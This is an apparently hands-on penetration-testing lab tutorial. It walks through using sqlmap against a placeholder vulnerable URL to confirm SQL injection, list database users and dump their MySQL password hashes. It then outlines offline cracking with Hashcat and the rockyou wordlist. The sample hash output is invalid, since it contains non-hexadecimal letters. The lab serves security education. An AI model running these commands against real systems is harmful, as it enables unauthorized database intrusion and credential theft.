Introduction
In this lab, you will explore the capabilities of sqlmap, an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Specifically, you will learn how to enumerate database users and attempt to dump password hashes from a target database. This is a crucial step in many penetration tests, as gaining access to user credentials can lead to further compromise of systems. You will use a simulated vulnerable web application to practice these techniques in a controlled environment.
Gain a Foothold and Confirm Sufficient Privileges
In this step, you will start by identifying a potential SQL injection vulnerability and confirming that sqlmap can successfully interact with the target database. This initial check is vital to ensure that you have a "foothold" and that the current user has sufficient privileges to perform further enumeration.
First, open your terminal. The default working directory is /home/labex/project.
We will use a placeholder URL for a vulnerable web application. In a real-world scenario, you would have identified this URL through reconnaissance and vulnerability scanning. For this lab, let's assume our target is http://example.com/vulnerable.php?id=1.
Execute the following sqlmap command to test for SQL injection and gather basic information about the database. The -u flag specifies the target URL, and --current-user attempts to retrieve the current database user.
sqlmap -u "http://example.com/vulnerable.php?id=1" --current-user
You will see output similar to this, indicating sqlmap is testing various injection points and confirming the current user:
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | .'| . |
|___|_|_|_|_|_|__,| _|
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-27/
... (various tests and information) ...
[INFO] the back-end DBMS is MySQL
current user: 'root@localhost'
The output current user: 'root@localhost' indicates that sqlmap successfully identified the current database user. This is a good sign, as root typically has high privileges, which will be necessary for dumping users and hashes.
Use the --users Flag to List All Database Users
In this step, you will use the --users flag in sqlmap to enumerate all database users. This is a common next step after confirming a SQL injection vulnerability and sufficient privileges. Knowing the database users can provide valuable information for further attacks or understanding the database structure.
Continue in your terminal.
Execute the following sqlmap command. The --users flag tells sqlmap to list all users in the database.
sqlmap -u "http://example.com/vulnerable.php?id=1" --users
sqlmap will perform its tests and then attempt to retrieve the list of database users. You should see output similar to this:
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | .'| . |
|___|_|_|_|_|_|__,| _|
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-27/
... (various tests and information) ...
[INFO] fetching database users
[INFO] retrieved database users:
[+] 'root@localhost'
[+] 'admin@localhost'
[+] 'webuser@localhost'
[INFO] retrieved 3 database user(s)
This output shows that sqlmap successfully enumerated three database users: root@localhost, admin@localhost, and webuser@localhost. This information is crucial for the next step, where you will attempt to dump their password hashes.
Use the --passwords Flag to Attempt Dumping Password Hashes
In this step, you will escalate your attack by attempting to dump the password hashes associated with the enumerated database users. This is often the ultimate goal of a SQL injection attack, as these hashes can then be cracked offline to obtain plaintext passwords.
Continue in your terminal.
Execute the following sqlmap command. The --passwords flag instructs sqlmap to retrieve password hashes for all database users.
sqlmap -u "http://example.com/vulnerable.php?id=1" --passwords
sqlmap will now attempt to extract the password hashes. The process might take some time depending on the database size and complexity. You should see output similar to this, showing the retrieved users and their corresponding password hashes:
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | .'| . |
|___|_|_|_|_|_|__,| _|
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-27/
... (various tests and information) ...
[INFO] fetching database users password hashes
[INFO] retrieved database users password hashes:
[+] 'root@localhost': *A4A6B7C8D9E0F1G2H3I4J5K6L7M8N9O0P1Q2R3S4
[+] 'admin@localhost': *B5C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3
[+] 'webuser@localhost': *C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3U4
[INFO] retrieved 3 database user(s) password hash(es)
The output displays the usernames and their associated password hashes. These hashes are typically stored in a format specific to the database system (e.g., MySQL's * prefixed hashes, or various other hashing algorithms). These hashes are now ready for offline cracking.
Execute the Enumeration and Analyze the Results
In this step, you will combine the previous commands to perform a full enumeration of users and their password hashes in a single sqlmap execution. This is a more efficient way to gather all the desired information. You will also analyze the output to understand the structure of the retrieved data.
Continue in your terminal.
Execute the following sqlmap command, combining the --users and --passwords flags:
sqlmap -u "http://example.com/vulnerable.php?id=1" --users --passwords
sqlmap will run through its process, first enumerating users and then attempting to retrieve their password hashes. The output will consolidate the information, similar to what you saw in the previous steps, but presented together.
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | .'| . |
|___|_|_|_|_|_|__,| _|
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-27/
... (various tests and information) ...
[INFO] fetching database users
[INFO] retrieved database users:
[+] 'root@localhost'
[+] 'admin@localhost'
[+] 'webuser@localhost'
[INFO] fetching database users password hashes
[INFO] retrieved database users password hashes:
[+] 'root@localhost': *A4A6B7C8D9E0F1G2H3I4J5K6L7M8N9O0P1Q2R3S4
[+] 'admin@localhost': *B5C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3
[+] 'webuser@localhost': *C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3U4
[INFO] retrieved 3 database user(s) password hash(es)
Analyze the results:
- Users: You can clearly see the list of database users.
- Hashes: Each user is associated with a password hash. The format of these hashes depends on the database system and its configuration. For example, MySQL hashes often start with an asterisk (
*).
This combined command is efficient for gathering both pieces of information in one go.
Discuss Next Steps for Offline Password Cracking with the Hashes
In this final step, you will understand the implications of successfully dumping password hashes and discuss the next logical steps: offline password cracking. While sqlmap helps you retrieve the hashes, it does not crack them. This is typically done using specialized tools.
You have successfully retrieved password hashes like:
*A4A6B7C8D9E0F1G2H3I4J5K6L7M8N9O0P1Q2R3S4(forroot@localhost)*B5C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3(foradmin@localhost)*C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3U4(forwebuser@localhost)
These hashes are not the actual passwords but a cryptographic representation of them. To obtain the plaintext passwords, you would typically use tools like Hashcat or John the Ripper.
Offline Password Cracking Process:
- Identify Hash Type: The first step is to identify the type of hash.
sqlmapoften provides hints (e.g., "MySQL password hash"). Tools likeHashcathave modes for various hash types. - Save Hashes: Save the retrieved hashes into a file, with one hash per line. For example, you could create a file named
hashes.txtin your~/projectdirectory:*A4A6B7C8D9E0F1G2H3I4J5K6L7M8N9O0P1Q2R3S4 *B5C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3 *C6D7E8F9G0H1I2J3K4L5M6N7O8P9Q0R1S2T3U4 - Choose a Cracking Tool:
- Hashcat: A powerful and fast password cracker, often used with GPUs.
- John the Ripper (JtR): Another popular and versatile password cracker.
- Select Cracking Method:
- Dictionary Attack: Use a list of common passwords (a wordlist) and hash each word, comparing it to the target hashes.
- Brute-Force Attack: Systematically try every possible character combination until a match is found. This is very time-consuming for long or complex passwords.
- Hybrid Attack: Combine dictionary and brute-force methods.
- Execute Cracking: Run the chosen tool with the hash file and selected cracking method. For example, using
Hashcatfor MySQL hashes (mode300):
(Note:## This command is for illustrative purposes and will not be executed in this lab. ## hashcat -m 300 hashes.txt /usr/share/wordlists/rockyou.txt --forcerockyou.txtis a common wordlist, often found in/usr/share/wordlists/on Kali Linux or similar distributions. It might need to be unzipped.)
Successful cracking will reveal the plaintext passwords, which can then be used to gain further access to the database or other systems where these credentials might be reused. This highlights the importance of strong, unique passwords and proper hashing algorithms for security.
Summary
In this lab, you successfully learned how to use sqlmap to enumerate database users and dump their password hashes from a simulated vulnerable web application. You started by gaining a foothold and confirming sufficient privileges, then proceeded to list all database users using the --users flag, and finally attempted to dump password hashes using the --passwords flag. You also learned how to combine these operations for efficiency and analyzed the output.
Understanding how to extract this sensitive information is a critical skill in penetration testing. The retrieved password hashes are the key to the next phase: offline password cracking, which can reveal plaintext credentials and potentially lead to deeper system compromise. This lab provided a practical, hands-on experience with a powerful tool in the ethical hacking arsenal.
